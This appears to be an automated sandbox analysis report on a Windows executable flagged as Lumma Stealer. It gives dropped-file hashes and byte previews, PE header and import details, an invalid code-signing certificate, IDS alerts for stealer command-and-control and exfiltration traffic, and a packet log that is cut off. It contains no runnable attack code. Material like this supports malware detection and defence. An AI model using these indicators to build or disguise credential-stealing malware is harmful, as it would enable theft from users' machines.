                                              Preview:.I..!.`x...yh.b.g.?._...H....A(i..zL.....dW..|w:,EP.F+.K0y..d...p.[...=.........w.......6o...Z........KU...l..'...bkMJ....lI.....F..Yd..r1UXQW.i...p..Z.<..E.v.Gl....).C.'.v.F..}B.B...v....e..\....-....;M...}.....N....l..9..4i_u..fYC..e.q...rq._..X........S...0.B.`...L.V.l.`o1!4M"......K.....4.R.....".<q....=.J....#i.Q...6&.....{....NH..}..u(m..+@........{.....xI.}(....xK..M.Tq>:..+<m~......1..rX...tK...*.3Yl...KX......U*.......,.......5...9.....o..7..&..~.s....N4..U..X.Y.N}`e....2.j..9..'eZQ...i......_K...?..W.z..TULSh..l8..<R..x.....U.~c.J.l.xqHo..?...Jl.@.W..k.0QQ[.......q/..ri.5M..e%}.@.. .].....J.=d.%.....1s.l.l..{4-I.u..A.-..nm..>.6.?pG...+6........:.|....D.S..S.1...5?...--}....k]I..oy..8....~!..+..)..z...0...6p<.#2.....d...q..#.,M,.X.....Vbq.OEE._1l...0.$.c..yYr.%....l......*.E....&...v.........6~b.'..E......-*........H.V.z...jQ..M..>.H ..\..*.e.vk...e.7......|....e..'.%...z..n...u...$j&.I...U.H...s[..T.....p.Q/..w..\.Z....e.Fh.T.

                                              C:\Users\user\AppData\Local\Temp\Producing

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):72704
                                              Entropy (8bit):6.689808554469509
                                              Encrypted:false
                                              SSDEEP:1536:xI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7Y:e4CE0Imbi80PtCZEk
                                              MD5:AA4D881EA35979E4EAB13C982D3D0898
                                              SHA1:CF301086D6E43E603571762FBC7D754F0246FB74
                                              SHA-256:31D85BEBE7949C9B7B40AF007FBBE61C8CD6C25F8E4FC7DCFE9B7DCD8A1D79E7
                                              SHA-512:F64491753F2CF57B72740CA91F10C2BD677219BC89BF86D2476A8567CF83955F986A481C92D19BEF9C466438AF97D071686EA2FC496C5E477C900568F129B5F6
                                              Malicious:false
                                              Preview:.......f..L$..T$......T$.....T$...$......D$.....f..T$.f..D$.f.~.f.s. f.~...........t.......d$.U.........$..~<$.........~|$.f...f.(.f.T..AJ.f....BJ.........U...f./..BJ.snf./..BJ.......f.(.f.Y.f.(.f.Y.f.(-pBJ.f.Y.f.X-`BJ.f.Y.f.X-PBJ.f.Y.f.X-@BJ...Y.f.(.f......X...Y...\.f..|$..D$..f./..BJ.......f.(.f.Y.f.(.f.Y.f.(-0BJ.f.Y.f.X- BJ.f.Y.f.X-.BJ.f.Y.f.X-.BJ.f.Y.f.X-.AJ.f.Y.f.X-.AJ.f.Y.f.X-.AJ.f.Y.f.X-.AJ...Y.f.(.f......X...Y...\.f..|$..D$....~.f.W.f./..BJ.sO..~..BJ...~-.BJ...~...X.f.s.,f...f.~..@..~,.p.J...~...\...Y...X..BJ...^.f............~...~..BJ...^.f.....~..`.J...~$.h.J.f.(.f.Y.f.(.f.Y.f.(-pBJ.f.Y.f.X-`BJ.f.Y.f.X-PBJ.f.Y.f.X-@BJ...Y.f.(.f......X...Y...\...\...\.f.V.f..D$..D$..f./..BJ.u..D$..f./..BJ.s....BJ....BJ......$..$....D$.....BJ....BJ..D$....~...~..AJ.f.T.f...z..D$.......BJ....AJ...D$..........U.........$..~.$.......f..D$.f..%.CJ.f....CJ.f.W.f....CJ.....f.s.,f.~....... ..f.............#.-....=............Y........\...Q.f.T.........f...Up.J.f.V.f.($.p.J.......X...\...Y..

                                              C:\Users\user\AppData\Local\Temp\Receiving

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):62464
                                              Entropy (8bit):7.9971672365789415
                                              Encrypted:true
                                              SSDEEP:768:ttBffnhuy/kWZ4KmEvLGxvyj85XqOlWChh7diY+BChE2u0W5zqirJebuswzA:ttBHnhuyXNwvouXqO93diTn2u0NOeizA
                                              MD5:8D5CF0056A8BE7CA1485969FC23F72A5
                                              SHA1:5727BC17CD958D06B1E7D52C8D38A761A1AE2BF2
                                              SHA-256:BD1B00DEA1CDDB3345443A35AE3B71883443722EDBB48016F829AC500F5F505B
                                              SHA-512:B0F5FB69A565FC9690F307175C606CE9F9484BC309AC00B8A359CB6B77D19A938052EC584919A256FDB7C0B1557E155B414090B771432ACB9419102F794B61EC
                                              Malicious:false
                                              Preview:.v..........^...F.y`.QLu..Eu...(.]6S./..B}..M./.5.7.....@:../;.h..S......x....*...^...9......=.....;....l.G.A.>E.=..{.[.~..<b%....N..V..~W...ed_..PqM)d%.........Hg...CB...Y...&....ON].....[X......[...H.P.M....+.D...'.....1.Plu.zRg2.!4..^...h....[\....!Y.6u..........E..q.,W.jv..i..I......`.........2.?;(...P7ap..6.e...w...W..tI...3.S.....j....B.B...v.Q..4...R~....y1.9l{^.V.s..@.x.3.N......-w...B..{\:_......,t.O2.L\m2'..J.e...Y..d.*...^.p.Z...^.K.p3i..:.L.<...1T...#...V.Ey37.h7./......^}.c1..[.N...\..9D...?..b...tz.E`.w........B.=..uB..=.3.....8../.g.i.sv....+...M...9#i.r..e..U.R.1.-K.....|.;.U.y..N.-~.j.|F.....Nyn..Qd2..@...d..\....9R..=...K0+..2.....`...&>..\..]; .*.X,....+..........+....!.....e.......l....>.m..P .\..dIO...bB.^.ph'..6.Ll...3...<..D..Q....nv.~...h.jm.....L.}7.s.k].j7..H....0...j#.&.=.H..DY..j.&..dD.......wH.X....=st.H.b.#M;..L.C.I.6..#4a^3.i........Z..{2c..8.w...9O.G../;.a.l.h..n..".%.t.A.}Dc.s.nNa...M...w..p%Al\.$WV.

                                              C:\Users\user\AppData\Local\Temp\Solely

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):107520
                                              Entropy (8bit):6.2684070117846975
                                              Encrypted:false
                                              SSDEEP:3072:pg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laG:a5vPeDkjGgQaE/lx
                                              MD5:2FADD2BF6F3CDC055416BAA1528652E9
                                              SHA1:342D96C7CE7B431E76C15C9A7386C2A75E3DC511
                                              SHA-256:8DF18D17C715E689B9CB222BEB699120B592464460FD407DBB14F59CCEC5FDB3
                                              SHA-512:08BC19703DAD1441E1DA8FB011C42241A4C90D8355575B7F41D465E3E84D797ECAC7D6BF9AF6163E6F4EF506CD98561F62D06446F861AEBA2D7644BEB7F6ABB8
                                              Malicious:false
                                              Preview:....T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l....E...p....E.PV..x.I..M.E.;.t...u.;.x...uw.s..5..I.......f#.j.f.E.X.s.....E...u.f......f#.j.X...f.M..E.;.|..........}..t...|...;.......;....}..t......._^[.....}....t.....x.....s.......U......(M.V.u.WV.......@)M.....8..........;u.........M...E......Q.u.j V..x.I._^....U....

                                              C:\Users\user\AppData\Local\Temp\Sunrise

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):63488
                                              Entropy (8bit):6.678836431320186
                                              Encrypted:false
                                              SSDEEP:1536:ECX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLOy:fXnmowS2u5hVOoQ7t8T6pUkBJRy
                                              MD5:9E4FE1F2538C08F75AE16A3E349C9EF2
                                              SHA1:559879228568B2F405400B34DFB19E59F139FA2C
                                              SHA-256:22CE756672ACA3A4BA015903B4C36E7667E15C73157759E5A2212E7D4E727CC0
                                              SHA-512:A1F6BF183C590CC62000DDDB0FEA63BAE2BDC30FCE8EBFA24286B9FB8B2415C67B2363F739D36B32CC7B477E608397EFBE45173173AA3F27ED44E9B75448B9EC
                                              Malicious:false
                                              Preview:.{..C..C..C..C..C...u..u......{(......C8.....x............E.3.P.C(.u.Pj.V.C.P..X.I...x..u........9s........C..@.......}.........j.....I.h.pL.W...{.....I.....tn.........xj.e...E.PhT.J..C.P...xC.M...t<...U.R.S(Rj.Q.P...x..}..t..u....]....{..u..C..@...E.P...Q....C........C./...V....I....C.T..._^..[....V..N...(pL...t...Q.P....F....N...t...Q.P.j<V...YY..^...U..E...8P..D.I.]...U..E..H...t..u....u..u..u..u.Q.P.....@..]...U..S..M.j..S.."...Y..x4.}...C(u.VW.d.J......._^..P.u...\.I...y..C......C.........C.[]...U..E..H...t..u....u..u.Q.P.....@..]...U..E..H...t..u...Q.P.....@..]...U..VW.}...........F.Phd.J.W....W.P._^]...U..E..H...t .u(...u$.u .u..u..u..u..u.Q.P.....@..].$.U.............V..h....P.v.....I...tkW.~.Wj.......P..4.I...xHj.......P.7..0.I...x..F......%j.......P.7..,.I...x..F........F......F....J....F._....@...F.^..U..E..H...t..u....u.Q......@..]...U..V.u..F8P..@.I...u...t.Q......3.^]...U..QV..~..t_.F..M.QP...R...xN.~..u..M..q...A..q.P..A.PQ..(.I.. .~..u..M..q...A..q.P.

                                              C:\Users\user\AppData\Local\Temp\Veterinary

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2852
                                              Entropy (8bit):5.490446063863794
                                              Encrypted:false
                                              SSDEEP:48:I9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+MAyKnFHbgk:0SEA5O5W+MfH5S1CqlVJcI6mlb/
                                              MD5:6F07C56590CB57E03B68F9E2F994390C
                                              SHA1:AEE254034B1F3394A97304C8DFBAE1911440E2C0
                                              SHA-256:1772CFD25C5DEB74DACC6FC88AA8793A74C89A81452B27E886CA49557BA32D84
                                              SHA-512:0AF18E6D07C161A5088CEC9A56654C9F661AC003F0E22B68B6DBFE2920BB344F4D9A1326C261957C2309BB44DCB39453630F33068A057A1A6C2960EDFBD39001
                                              Malicious:false
                                              Preview:Anchor........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.975817752785393
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:LVDdWBGnVE.exe
                                              File size:1'294'445 bytes
                                              MD5:5a909c9769920208ed3d4d7279f08de5
                                              SHA1:656f447088626150e252cbf7df6f8cd0de596fa0
                                              SHA256:5f2c26e780639a76f10c549e7dea1421c4f06093c1facbf4dd8cf0a8b2fee8cb
                                              SHA512:c6038048bd09c8f704246a6ba176ea63b1c8d23f2e127600c50bac50f3032c1b751ea8e405a2fe1ea707f75f21cf6516447345a84751bc677d94874d4b91090b
                                              SSDEEP:24576:ovHavrNGiB7Ld0Pbd04XWxCQkcMeiPoHe/wh1b2BcGtF4GFx6w:gA59BMdxXoTMYCwsFhJ
                                              TLSH:BE5523872AFA6063FBE20FB985F51C0349AAF5271CF89A0F59114E8978993C1DC5D70B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...v...B...8.....

                                              File Icon

                                              Icon Hash:70ec9eb233f8f070

                                              Static PE Info

                                              General

                                              Entrypoint:0x4038af
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:be41bf7b8cc010b614bd36bbca606973

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 23/01/2024 05:24:28 12/03/2025 12:08:47
                                              Subject Chain
                                              • E=a.tozzi@entersrl.it, CN=Enter Srl, OU=Enter Srl, O=Enter Srl, STREET=VIA CARLO ALBERTO DALLA CHIESA 18, L=Grottammare, S=Ascoli Piceno, C=IT, OID.1.3.6.1.4.1.311.60.2.1.3=IT, SERIALNUMBER=01524500442, OID.2.5.4.15=Private Organization
                                              Version:3
                                              Thumbprint MD5:D5D66EA7AE498CF896CF422DE5426590
                                              Thumbprint SHA-1:232E8A3F99CB8B202BE4DD8A235590F838B29038
                                              Thumbprint SHA-256:9B04FC852CDCBDA62D870E4112459D2A2A30586909E0E76B77AFA5DDF6FBA631
                                              Serial:5600D74B2CE1156218EEA30D

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push ebp
                                              push esi
                                              push edi
                                              push 00000020h
                                              xor ebp, ebp
                                              pop esi
                                              mov dword ptr [esp+18h], ebp
                                              mov dword ptr [esp+10h], 0040A268h
                                              mov dword ptr [esp+14h], ebp
                                              call dword ptr [00409030h]
                                              push 00008001h
                                              call dword ptr [004090B4h]
                                              push ebp
                                              call dword ptr [004092C0h]
                                              push 00000008h
                                              mov dword ptr [0047EB98h], eax
                                              call 00007FA5C4DAD75Bh
                                              push ebp
                                              push 000002B4h
                                              mov dword ptr [0047EAB0h], eax
                                              lea eax, dword ptr [esp+38h]
                                              push eax
                                              push ebp
                                              push 0040A264h
                                              call dword ptr [00409184h]
                                              push 0040A24Ch
                                              push 00476AA0h
                                              call 00007FA5C4DAD43Dh
                                              call dword ptr [004090B0h]
                                              push eax
                                              mov edi, 004CF0A0h
                                              push edi
                                              call 00007FA5C4DAD42Bh
                                              push ebp
                                              call dword ptr [00409134h]
                                              cmp word ptr [004CF0A0h], 0022h
                                              mov dword ptr [0047EAB8h], eax
                                              mov eax, edi
                                              jne 00007FA5C4DAAD2Ah
                                              push 00000022h
                                              pop esi
                                              mov eax, 004CF0A2h
                                              push esi
                                              push eax
                                              call 00007FA5C4DAD101h
                                              push eax
                                              call dword ptr [00409260h]
                                              mov esi, eax
                                              mov dword ptr [esp+1Ch], esi
                                              jmp 00007FA5C4DAADB3h
                                              push 00000020h
                                              pop ebx
                                              cmp ax, bx
                                              jne 00007FA5C4DAAD2Ah
                                              add esi, 02h
                                              cmp word ptr [esi], bx

                                              Rich Headers

                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ C ] VS2010 SP1 build 40219
                                              • [RES] VS2010 SP1 build 40219
                                              • [LNK] VS2010 SP1 build 40219

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x4059a.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1389850x36e8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x1000000x4059a0x40600f7e3176c83cba6181bbff15d7cb4ca53False0.9838971480582525data7.8943783332487945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x1410000xfd60x1000bacc409253667486bbf5d7dd9f0fd370False0.597412109375data5.5866043665988805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x1001c00x3f9f9PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9884344265754929
                                              RT_ICON0x13fbbc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7730496453900709
                                              RT_DIALOG0x1400240x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0x1401240x11cdataEnglishUnited States0.6056338028169014
                                              RT_DIALOG0x1402400x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0x1402a00x22dataEnglishUnited States0.9705882352941176
                                              RT_MANIFEST0x1402c40x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                              Imports

                                              DLLImport
                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-24T08:58:39.365928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649812104.21.63.229443TCP
                                              2024-12-24T08:58:40.118283+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649812104.21.63.229443TCP
                                              2024-12-24T08:58:40.118283+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649812104.21.63.229443TCP
                                              2024-12-24T08:58:41.351835+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649818104.21.63.229443TCP
                                              2024-12-24T08:58:42.110697+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649818104.21.63.229443TCP
                                              2024-12-24T08:58:42.110697+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649818104.21.63.229443TCP
                                              2024-12-24T08:58:43.594426+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649825104.21.63.229443TCP
                                              2024-12-24T08:58:44.625392+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649825104.21.63.229443TCP
                                              2024-12-24T08:58:46.085369+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649832104.21.63.229443TCP
                                              2024-12-24T08:58:48.258563+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649838104.21.63.229443TCP
                                              2024-12-24T08:58:50.677704+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649845104.21.63.229443TCP
                                              2024-12-24T08:58:52.687696+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649852104.21.63.229443TCP
                                              2024-12-24T08:58:55.054859+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649860104.21.63.229443TCP
                                              2024-12-24T08:58:57.814441+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649867104.21.63.229443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 24, 2024 08:58:38.138048887 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:38.138091087 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:38.138360023 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:38.143354893 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:38.143368006 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:39.365823984 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:39.365927935 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:39.383068085 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:39.383081913 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:39.384306908 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:39.437066078 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:39.437092066 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:39.437355042 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:40.118380070 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:40.118668079 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:40.118855953 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:40.121012926 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:40.121037006 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:40.121049881 CET49812443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:40.121057987 CET44349812104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:40.128664970 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:40.128710032 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:40.128793001 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:40.129101992 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:40.129117012 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:41.351663113 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:41.351835012 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:41.356969118 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:41.356981993 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:41.357323885 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:41.358472109 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:41.358491898 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:41.358566046 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.110774040 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.110955954 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.111033916 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.111052990 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.111080885 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.111133099 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.111181974 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.111393929 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.111442089 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.111453056 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.116197109 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.116254091 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.116281986 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.124795914 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.124857903 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.124866962 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.173496962 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.173511028 CET44349818104.21.63.229192.168.2.6
                                              Dec 24, 2024 08:58:42.220494032 CET49818443192.168.2.6104.21.63.229
                                              Dec 24, 2024 08:58:42.230365038 CET44349818104.21.63.229192.168.2.6
